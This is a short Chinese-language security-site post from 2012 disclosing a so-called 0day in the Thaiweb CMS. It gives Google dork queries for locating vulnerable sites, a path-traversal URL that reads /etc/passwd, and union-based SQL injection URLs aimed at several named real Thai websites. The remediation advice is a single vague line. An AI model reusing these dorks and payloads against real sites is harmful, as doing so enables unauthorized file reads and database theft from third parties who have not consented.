频道栏目
首页 > 安全 > 网站安全 > 正文

Thaiweb远程文件sql注入漏洞0day及修复

2012-12-24 10:32:22           
收藏   我要投稿
 Google之:

 

intext:powered by Thaiweb

 

inurl:index.php?page=board.php

 

 

利用点1:https://www.2cto.com /index.php?page=../../../../../../../../../../../../../etc/passwd

 

 

利用点2:https://www.2cto.com /index.php?page=boardque.php&bod_id=4'

 

 

https://www.keytasin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

 

https://www.autopartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

 

https://gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--


修复方案:
过相应参数输入进行严格检查

相关TAG标签 漏洞 文件
上一篇:Web攻防系列教程之企业网站攻防实战
下一篇:对某站的一次渗透AND某系统的所谓0DAY
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站